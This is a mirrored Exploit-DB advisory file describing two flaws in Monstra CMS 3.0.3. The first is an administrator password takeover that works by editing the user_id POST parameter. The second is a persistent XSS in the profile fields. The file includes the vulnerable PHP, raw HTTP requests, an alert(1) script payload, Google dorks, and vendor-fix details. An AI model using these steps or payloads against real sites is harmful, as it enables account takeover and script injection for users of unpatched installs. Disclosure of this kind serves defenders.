bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/39567.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

133 lines
No EOL
5.6 KiB
Text
Raw Blame History

Exploit Title: Monstra CMS 3.0.3 - Privilege Escalation / Remote Password Change
Google Dork: intext:"Powered by Monstra"/users/registration
Date: 2016-03-28
Exploit Author: Sarim Kiani
Vendor Homepage: http://monstra.org
Software Link: http://monstra.org/download
Version: 3.0.3
Tested on: Windows OS
==================== TIMELINE ====================
- Discovery Date: March 16 2016
- Disclosed to Vendor: March 22 2016
- Vendor Fixed the Issue: March 27 2016
==================================================
Bug Tracking ID: Github Issue # 405
Link: https://github.com/monstra-cms/monstra/issues/405
Application Description: Monstra is a modern light weighted Content Management System written in php.
1. Vulnerability Description:
Any user can change credentials of other users including the Administrator credentials. This can allow the attacker to gain Administrator access and completely compromise the application.
Once logged in as a regular user or successfully registering as a new user, use the following URL to gain information (username) of other users:
http://localhost/monstra-3.0.3/users/1
The digit '1' is of Admin or first user created in the database. By changing the digit, all registered usernames can be found.
Then by using the 'Edit Profile' option of own user account, password of any other user including the Administrator can be changed by changing the POST parameters 'user_id', 'login' and 'new_password'.
2. Proof of Concept/Code Flaw:
`In file monstra\plugins\box\users\users.plugin.php
Function: getProfileEdit
Line No: 233
if (Users::$users->update(Request::post('user_id'),
array('login' => Security::safeName(Request::post('login')),
'firstname' => Request::post('firstname'),
'lastname' => Request::post('lastname'),
'email' => Request::post('email'),
'skype' => Request::post('skype'),
'about_me' => Request::post('about_me'),
'twitter' => Request::post('twitter')))) {
// Change password
if (trim(Request::post('new_password')) != '') {
Users::$users->update(Request::post('user_id'), array('password' => Security::encryptPassword(trim(Request::post('new_password')))));
}
Notification::set('success', __('Your changes have been saved.', 'users'));
Request::redirect(Site::url().'/users/'.$user['id']);
On editing profile user id is taken from Request::post('user_id'). An attacker can provide any user id on change password funcionality
Users::$users->update --> updates the password`
Header:
> POST /monstra-3.0.3/users/8/edit HTTP/1.1
Host: localhost
Content-Length: 152
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/monstra-3.0.3/users/8/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; has_js=1; PHPSESSID=abtuklkn1r0rjbub01527gjav0; _ga=GA1.1.592562515.1457951975; login_attempts=i%3A4%3B
csrf=eb616fed8ca93d9de582a4f7d75ee3a3a0d6e3ec&user_id=8&login=user&firstname=&lastname=&email=&twitter=&skype=&about_me=&new_password=&edit_profile=Save
3. Solution:
Vendor has resolved the issue, use the patch 'User Security Fix # 406'.
Link: https://github.com/monstra-cms/monstra/pull/406/commits/2e2a22ee5aafa28771f87c108edea024b618a8d5
##################################################################################
#Exploit Title: Monstra CMS 3.0.3 - Persistent XSS
#Google Dork: intext:"Powered by Monstra"
#Date: 2016-03-16
#Exploit Author: Sarim Kiani
#Vendor Homepage: http://monstra.org
#Software Link: http://monstra.org/download
#Version: 3.0.3
#Tested on: Windows OS
Monstra is a modern light weighted Content Management System written in php.
1. Description
A Persistent XSS exists in the "Edit Profile" page of the application.
2. Proof of Concept
Any user entering personal information in the "Edit Profile" page of the application can insert XSS Payload in the Form.
Payload: "><script>alert(1);</script>
The following entries on the page are vulnerable to a Persistent XSS payload:
'Firstname', 'Lastname', 'Email', 'Twitter', 'Skype' and 'About Me'.
POST /monstra-3.0.3/users/8/edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/monstra-3.0.3/users/8/edit
Cookie: GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; SCREEN_NAME=5374564c7570434448716b3d; SESS7a361a010634612fb69871c3ab2715f1=05e_dlYEnDv4-n3tC89gHEXGp3l-L5CXZY7LNgxFIFg; docebo_session=an9dgdq6rmlg3bv5b29tj45653; PHPSESSID=no30picpa0c5khn86lmcd53cb5; _ga=GA1.1.739562915.1457952544
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 440
csrf=685bba70d144b8b8727937b56f5b87e669135fe1&user_id=8&login=user&firstname=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&lastname=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&twitter=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&skype=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&about_me=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&new_password=&edit_profile=Save
3.Solution
No newer (fixed) versions are currently available.
Reference in a new issue View git blame Copy permalink